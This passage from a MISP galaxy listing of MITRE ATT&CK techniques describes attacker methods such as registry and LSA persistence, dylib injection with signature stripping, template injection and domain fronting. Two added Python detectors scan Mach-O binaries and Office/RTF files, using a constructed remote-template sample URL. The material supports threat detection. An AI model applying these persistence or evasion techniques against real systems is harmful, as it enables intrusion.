For example, cloud environments typically provide easily accessible interfaces to obtain user lists. On hosts, adversaries can use default [PowerShell](https://attack.mitre.org/techniques/T1059/001) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files.

The tag is: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087"

Table 6230. Table References

Links

https://attack.mitre.org/techniques/T1087

https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql

Valid Accounts - T1078

Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.

In some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.(Citation: CISA MFA PrintNightmare)

The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.(Citation: TechNet Credential Theft)

The tag is: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078"

Table 6231. Table References

Links

https://attack.mitre.org/techniques/T1078

https://technet.microsoft.com/en-us/library/dn487457.aspx

https://technet.microsoft.com/en-us/library/dn535501.aspx

https://www.cisa.gov/uscert/ncas/alerts/aa22-074a

https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/

Multilayer Encryption - T1079

An adversary performs C2 communications using multiple layers of encryption, typically (but not exclusively) tunneling a custom encryption scheme within a protocol encryption scheme such as HTTPS or SMTPS.

The tag is: misp-galaxy:mitre-attack-pattern="Multilayer Encryption - T1079"

Table 6232. Table References

Links

http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1079

https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html

https://www.fidelissecurity.com/sites/default/files/FTA_1018_looking_at_the_sky_for_a_dark_comet.pdf

Account Manipulation - T1098

Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials.

In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078).

The tag is: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098"

Table 6233. Table References

Links

https://attack.mitre.org/techniques/T1098

https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738

https://github.com/gentilkiwi/mimikatz/issues/92

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4670

Modify Registry - T1112

Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.

Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.

Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)

The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system’s [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.

The tag is: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112"

Table 6234. Table References

Links

https://attack.mitre.org/techniques/T1112

https://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/

https://docs.microsoft.com/en-us/sysinternals/downloads/regdelnull

https://docs.microsoft.com/sysinternals/downloads/reghide

https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4657

https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353

https://technet.microsoft.com/en-us/library/cc732643.aspx

https://technet.microsoft.com/en-us/library/cc754820.aspx

Authentication Package - T1131

Windows Authentication Package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages)

Adversaries can use the autostart mechanism provided by LSA Authentication Packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=<target binary></code>. The binary will then be executed by the system when the authentication packages are loaded.

The tag is: misp-galaxy:mitre-attack-pattern="Authentication Package - T1131"

Table 6235. Table References

Links

http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html

https://attack.mitre.org/techniques/T1131

https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx

https://technet.microsoft.com/en-us/library/dn408187.aspx

Screen Capture - T1113

Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as <code>CopyFromScreen</code>, <code>xwd</code>, or <code>screencapture</code>.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)

The tag is: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113"

Table 6236. Table References

Links

https://attack.mitre.org/techniques/T1113

https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/

https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen?view=netframework-4.8

Dynamic DNS - T1311

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1311).

Dynamic DNS is a method of automatically updating a name in the DNS system. Providers offer this rapid reconfiguration of IPs to hostnames as a service. (Citation: DellMirage2012)

The tag is: misp-galaxy:mitre-attack-pattern="Dynamic DNS - T1311"

Dynamic DNS - T1311 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Dynamic DNS - T1333" with estimative-language:likelihood-probability="almost-certain"

Table 6237. Table References

Links

https://attack.mitre.org/techniques/T1311

Email Collection - T1114

Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.

The tag is: misp-galaxy:mitre-attack-pattern="Email Collection - T1114"

Table 6238. Table References

Links

https://attack.mitre.org/techniques/T1114

https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/

Input Prompt - T1411

The operating system and installed applications often have legitimate needs to prompt the user for sensitive information such as account credentials, bank account information, or Personally Identifiable Information (PII). Adversaries may mimic this functionality to prompt users for sensitive information.

Compared to traditional PCs, the constrained display size of mobile devices may impair the ability to provide users with contextual information, making users more susceptible to this technique’s use.(Citation: Felt-PhishingOnMobileDevices)

Specific approaches to this technique include:

Impersonate the identity of a legitimate application

A malicious application could impersonate the identity of a legitimate application (e.g. use the same application name and/or icon) and get installed on the device. The malicious app could then prompt the user for sensitive information.(Citation: eset-finance)

Display a prompt on top of a running legitimate application

A malicious application could display a prompt on top of a running legitimate application to trick users into entering sensitive information into the malicious application rather than the legitimate application. Typically, the malicious application would need to know when the targeted application (and individual activity within the targeted application) is running in the foreground, so that the malicious application knows when to display its prompt. Android 5.0 and 5.1.1, respectively, increased the difficulty of determining the current foreground application through modifications to the ActivityManager API.(Citation: Android-getRunningTasks)(Citation: StackOverflow-getRunningAppProcesses). A malicious application can still abuse Android’s accessibility features to determine which application is currently in the foreground.(Citation: ThreatFabric Cerberus) Approaches to display a prompt include:

  • A malicious application could start a new activity on top of a running legitimate application.(Citation: Felt-PhishingOnMobileDevices)(Citation: Hassell-ExploitingAndroid) Android 10 places new restrictions on the ability for an application to start a new activity on top of another application, which may make it more difficult for adversaries to utilize this technique.(Citation: Android Background)

  • A malicious application could create an application overlay window on top of a running legitimate application. Applications must hold the SYSTEM_ALERT_WINDOW permission to create overlay windows. This permission is handled differently than typical Android permissions, and at least under certain conditions is automatically granted to applications installed from the Google Play Store.(Citation: Cloak and Dagger)(Citation: NowSecure Android Overlay)(Citation: Skycure-Accessibility) The SYSTEM_ALERT_WINDOW permission and its associated ability to create application overlay windows are expected to be deprecated in a future release of Android in favor of a new API.(Citation: XDA Bubbles)

Input Prompt - T1141

When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1088)).

Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1155)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and [PowerShell](https://attack.mitre.org/techniques/T1086)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015).

The tag is: misp-galaxy:mitre-attack-pattern="Input Prompt - T1141"

Table 6240. Table References

Links

https://attack.mitre.org/techniques/T1141

https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html

https://capec.mitre.org/data/definitions/569.html

https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/

https://logrhythm.com/blog/do-you-trust-your-computer/

https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/

Clipboard Data - T1115

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

For example, on Windows adversaries can access clipboard data by using <code>clip.exe</code> or <code>Get-Clipboard</code>.(Citation: MSDN Clipboard)(Citation: clip_win_server)(Citation: CISA_AA21_200B) Additionally, adversaries may monitor then replace users’ clipboard with their data (e.g., [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002)).(Citation: mining_ruby_reversinglabs)

macOS and Linux also have commands, such as <code>pbpaste</code>, to grab clipboard contents.(Citation: Operating with EmPyre)

The tag is: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115"

Table 6241. Table References

Links

https://attack.mitre.org/techniques/T1115

https://blog.reversinglabs.com/blog/mining-for-malicious-ruby-gems

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/clip

https://medium.com/rvrsh3ll/operating-with-empyre-ea764eda3363

https://msdn.microsoft.com/en-us/library/ms649012

https://www.cisa.gov/uscert/ncas/alerts/aa21-200b

LC_LOAD_DYLIB Addition - T1161

Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies (Citation: Writing Bad Malware for OSX). There are tools available to perform these changes. Any changes will invalidate digital signatures on binaries because the binary is being modified. Adversaries can remediate this issue by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time (Citation: Malware Persistence on OS X).

The tag is: misp-galaxy:mitre-attack-pattern="LC_LOAD_DYLIB Addition - T1161"

Table 6242. Table References

Links

https://attack.mitre.org/techniques/T1161

https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
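As an added, defender-side example (not part of the MISP galaxy and not code from the cited Wardle papers): a small Python parser that walks the load commands of a 64-bit Mach-O file, lists every dylib the loader will pull in, and reports whether an LC_CODE_SIGNATURE command is present. That is the check the LC_LOAD_DYLIB Addition entry implies: an unexpected dylib path together with a missing signature command is the residue the technique leaves behind. The load-command constants are taken from Apple's <mach-o/loader.h>; the allow-list and the sample binaries produced by `build_macho` are constructed for the demonstration and are assumptions, not real files.

```python
import struct

# Mach-O constants (values from <mach-o/loader.h>)
MH_MAGIC_64 = 0xFEEDFACF
MH_CIGAM_64 = 0xCFFAEDFE          # MH_MAGIC_64 read with the wrong byte order
LC_LOAD_DYLIB = 0x0C
LC_CODE_SIGNATURE = 0x1D
LC_LOAD_WEAK_DYLIB = 0x80000018
LC_REEXPORT_DYLIB = 0x8000001F
LC_LOAD_UPWARD_DYLIB = 0x80000023
DYLIB_LOAD_CMDS = {LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB, LC_REEXPORT_DYLIB, LC_LOAD_UPWARD_DYLIB}

# mach_header_64: magic, cputype, cpusubtype, filetype, ncmds, sizeofcmds, flags, reserved
MACH_HEADER_64 = "IiiIIIII"


def parse_load_commands(data: bytes) -> dict:
    """Walk the load commands of a 64-bit Mach-O image.

    Returns the dylib paths the loader will resolve (in load order) and whether
    an LC_CODE_SIGNATURE command is present at all.
    """
    magic = struct.unpack("<I", data[:4])[0]
    if magic == MH_MAGIC_64:
        end = "<"
    elif magic == MH_CIGAM_64:
        end = ">"
    else:
        raise ValueError("not a 64-bit Mach-O image (fat/32-bit files are out of scope here)")
    hdr_size = struct.calcsize(end + MACH_HEADER_64)
    ncmds = struct.unpack(end + MACH_HEADER_64, data[:hdr_size])[4]

    dylibs, code_signed = [], False
    off = hdr_size
    for _ in range(ncmds):
        if off + 8 > len(data):
            raise ValueError("truncated load command table")
        cmd, cmdsize = struct.unpack(end + "II", data[off:off + 8])
        if cmdsize < 8 or off + cmdsize > len(data):
            raise ValueError("load command size out of bounds")
        if cmd in DYLIB_LOAD_CMDS:
            # dylib_command: the name is an lc_str, an offset relative to the command start
            name_off = struct.unpack(end + "I", data[off + 8:off + 12])[0]
            raw = data[off + name_off:off + cmdsize]
            dylibs.append(raw.split(b"\0", 1)[0].decode("utf-8", "replace"))
        elif cmd == LC_CODE_SIGNATURE:
            code_signed = True
        off += cmdsize
    return {"dylibs": dylibs, "code_signed": code_signed}


def audit_dylibs(data: bytes, allowlist) -> dict:
    """Compare the image's dylib list against a known-good baseline (an assumption here)."""
    info = parse_load_commands(data)
    return {
        "unexpected_dylibs": [d for d in info["dylibs"] if d not in allowlist],
        "signature_missing": not info["code_signed"],
    }


def _dylib_cmd(path: str) -> bytes:
    """Build one LC_LOAD_DYLIB command (constructed test input, not a real binary)."""
    name = path.encode() + b"\0"
    pad = (-(24 + len(name))) % 8               # cmdsize must be a multiple of 8
    cmdsize = 24 + len(name) + pad
    # cmd, cmdsize, name offset, timestamp, current_version, compatibility_version
    return struct.pack("<IIIIII", LC_LOAD_DYLIB, cmdsize, 24, 0, 0x10000, 0x10000) + name + b"\0" * pad


def build_macho(dylibs, signed: bool) -> bytes:
    """Constructed minimal header + load commands; enough for the parser, not runnable code."""
    cmds = b"".join(_dylib_cmd(d) for d in dylibs)
    if signed:
        # linkedit_data_command: cmd, cmdsize, dataoff, datasize (offsets are placeholders)
        cmds += struct.pack("<IIII", LC_CODE_SIGNATURE, 16, 0x1000, 0x200)
    ncmds = len(dylibs) + (1 if signed else 0)
    # CPU_TYPE_ARM64 (0x0100000C), MH_EXECUTE (2)
    hdr = struct.pack("<" + MACH_HEADER_64, MH_MAGIC_64, 0x0100000C, 0, 2, ncmds, len(cmds), 0, 0)
    return hdr + cmds


if __name__ == "__main__":
    allow = ["/usr/lib/libSystem.B.dylib"]
    print(audit_dylibs(build_macho(allow, signed=True), allow))
    print(audit_dylibs(build_macho(allow + ["/tmp/injected.dylib"], signed=False), allow))
```

On a real system the same parser can be pointed at files on disk (`open(path, "rb").read()`), but note that it handles only thin 64-bit images; universal (fat) binaries need their architecture slices split out first, and a present LC_CODE_SIGNATURE says nothing about whether the signature still validates, which is a job for `codesign --verify`.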

Code Signing - T1116

Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) However, adversaries are known to use code signing certificates to masquerade malware and tools as legitimate binaries (Citation: Janicab). The certificates used during an operation may be created, forged, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates)

Code signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)

Code signing certificates may be used to bypass security policies that require signed code to execute on a system.

The tag is: misp-galaxy:mitre-attack-pattern="Code Signing - T1116"

Table 6243. Table References

Links

http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates

http://www.thesafemac.com/new-signed-malware-called-janicab/

https://attack.mitre.org/techniques/T1116

https://en.wikipedia.org/wiki/Code_signing

https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/

Automated Collection - T1119

Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. In cloud-based environments, adversaries may also use cloud APIs, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data. This functionality could also be built into remote access tools.

This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files, as well as [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538) and [Cloud Storage Object Discovery](https://attack.mitre.org/techniques/T1619) to identify resources in cloud environments.

The tag is: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119"

Table 6244. Table References

Links

https://attack.mitre.org/techniques/T1119

Template Injection - T1221

Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, .xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are ZIP archives composed of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)

Properties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.

Adversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded.(Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched.(Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.(Citation: MalwareBytes Template Injection OCT 2017)

Adversaries may also modify the <code>*\template</code> control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.(Citation: Proofpoint RTF Injection)(Citation: Ciberseguridad Decoding malicious RTF files)

This technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting an SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.(Citation: Anomali Template Injection MAR 2018)(Citation: Talos Template Injection July 2017)(Citation: ryhanson phishery SEPT 2016)

The tag is: misp-galaxy:mitre-attack-pattern="Template Injection - T1221"

Table 6245. Table References

Links

http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html

https://attack.mitre.org/techniques/T1221

https://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/

https://blog.talosintelligence.com/2017/07/template-injection.html

https://ciberseguridad.blog/decodificando-ficheros-rtf-maliciosos/

https://docs.microsoft.com/previous-versions/office/developer/office-2007/aa338205(v=office.12)

https://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-template-injection/2104

https://github.com/ryhanson/phishery

https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-technique-poised-widespread

https://www.sans.org/reading-room/whitepapers/testing/template-injection-attacks-bypassing-security-controls-living-land-38780
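As an added example, not from the MISP galaxy or from any of the sources cited above: a Python scanner for the two template-reference locations the Template Injection entry describes, the attachedTemplate relationship inside an OOXML package's .rels parts and the `\*\template` group of an RTF file. It flags only targets that point off-host (HTTP/HTTPS/FTP URLs and UNC paths), because a local `file:///C:/...` attached template is normal Word behaviour and would otherwise drown the signal. The sample package and RTF bytes are constructed inline for the demonstration; hostnames use the reserved, non-resolving example.invalid name.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)
# {\*\template <target>} group in RTF; the target runs up to the closing brace
RTF_TEMPLATE_RE = re.compile(rb"\\\*\\template\s*([^}]*)\}")


def is_remote(target: str) -> bool:
    """True when a template target points off-host (URL or UNC path)."""
    t = target.strip().lower()
    if t.startswith(("http://", "https://", "ftp://", "\\\\")):
        return True
    # file://server/share is a UNC reference; file:///C:/... is a local path
    return re.match(r"file://[^/]", t) is not None


def scan_ooxml(blob: bytes) -> list:
    """Return (part, target) for every attachedTemplate relationship with a remote target."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                target = rel.get("Target", "")
                if (rel.get("Type") == ATTACHED_TEMPLATE
                        and rel.get("TargetMode") == "External"
                        and is_remote(target)):
                    findings.append((name, target))
    return findings


def scan_rtf(blob: bytes) -> list:
    """Return remote targets found in \\*\\template groups of an RTF file."""
    targets = [m.group(1).strip().decode("latin-1") for m in RTF_TEMPLATE_RE.finditer(blob)]
    return [t for t in targets if is_remote(t)]


def _sample_docx(template_target: str) -> bytes:
    """Constructed minimal package: only the settings .rels part, which is all the scanner reads."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
        f'Target="{template_target}" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


# Constructed RTF sample; example.invalid is a reserved name that never resolves.
SAMPLE_RTF = b"{\\rtf1\\ansi{\\*\\template https://example.invalid/t/template.dotm}{\\pard Hello\\par}}"

if __name__ == "__main__":
    print(scan_ooxml(_sample_docx("https://example.invalid/t/template.dotm")))
    print(scan_ooxml(_sample_docx("file:///C:/Users/u/Templates/Normal.dotm")))   # []
    print(scan_rtf(SAMPLE_RTF))
```

The scanner reads every .rels part rather than only `word/_rels/settings.xml.rels`, so the same check covers Excel and PowerPoint packages. The RTF regex is deliberately loose about whitespace because RTF writers vary; on real mail-gateway traffic it is worth pairing the hit with the forced-authentication angle from the entry, i.e. treating a UNC target as at least as serious as an HTTP one.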

Audio Capture - T1123

An adversary can leverage a computer’s peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening in on sensitive conversations to gather information.

Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.

The tag is: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123"

Table 6246. Table References

Links

https://attack.mitre.org/techniques/T1123

Data Encoding - T1132

Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.

The tag is: misp-galaxy:mitre-attack-pattern="Data Encoding - T1132"

Table 6247. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1132

https://en.wikipedia.org/wiki/Binary-to-text_encoding

https://en.wikipedia.org/wiki/Character_encoding

Encrypted Channel - T1521

Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.

The tag is: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1521"

Table 6248. Table References

Links

https://attack.mitre.org/techniques/T1521

Video Capture - T1512

An adversary can leverage a device’s cameras to gather information by capturing video recordings. Images may also be captured, potentially in specified intervals, in lieu of video files.

Malware or scripts may interact with the device cameras through an available API provided by the operating system. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1513) due to use of the device’s cameras for video recording rather than capturing the victim’s screen.

In Android, an application must hold the android.permission.CAMERA permission to access the cameras. In iOS, applications must include the NSCameraUsageDescription key in the Info.plist file. In both cases, the user must grant permission to the requesting application to use the camera. If the device has been rooted or jailbroken, an adversary may be able to access the camera without knowledge of the user.

The tag is: misp-galaxy:mitre-attack-pattern="Video Capture - T1512"

Table 6249. Table References

Links

https://attack.mitre.org/techniques/T1512

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-19.html

Video Capture - T1125

An adversary can leverage a computer’s peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.

Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim’s screen.

In macOS, there are a few different malware samples that record the user’s webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)

The tag is: misp-galaxy:mitre-attack-pattern="Video Capture - T1125"

Table 6250. Table References

Links

https://attack.mitre.org/techniques/T1125

https://objective-see.com/blog/blog_0x25.html

Login Item - T1162

MacOS provides the option to list specific applications to run when a user logs in. These applications run under the logged in user’s context, and will be started every time the user logs in. Login items installed using the Service Management Framework are not visible in the System Preferences and can only be removed by the application that created them (Citation: Adding Login Items). Users have direct control over login items installed using a shared file list which are also visible in System Preferences (Citation: Adding Login Items). These login items are stored in the user’s <code>~/Library/Preferences/</code> directory in a plist file called <code>com.apple.loginitems.plist</code> (Citation: Methods of Mac Malware Persistence). Some of these applications can open visible dialogs to the user, but they don’t all have to since there is an option to ‘Hide’ the window. If an adversary can register their own login item or modify an existing one, then they can use it to execute their code for a persistence mechanism each time the user logs in (Citation: Malware Persistence on OS X) (Citation: OSX.Dok Malware). The API method <code>SMLoginItemSetEnabled</code> can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1155) can do this as well (Citation: Adding Login Items).

The tag is: misp-galaxy:mitre-attack-pattern="Login Item - T1162"

Table 6251. Table References

Links

https://attack.mitre.org/techniques/T1162

https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/

https://capec.mitre.org/data/definitions/564.html

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Domain Fronting - T1172

Domain fronting takes advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) The technique involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the technique, "domainless" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).

For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.

The tag is: misp-galaxy:mitre-attack-pattern="Domain Fronting - T1172"

Table 6252. Table References

Links

http://www.icir.org/vern/papers/meek-PETS-2015.pdf

https://attack.mitre.org/techniques/T1172

AppCert DLLs - T1182

Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key under <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</code> are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. (Citation: Elastic Process Injection July 2017)

Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.

The tag is: misp-galaxy:mitre-attack-pattern="AppCert DLLs - T1182"

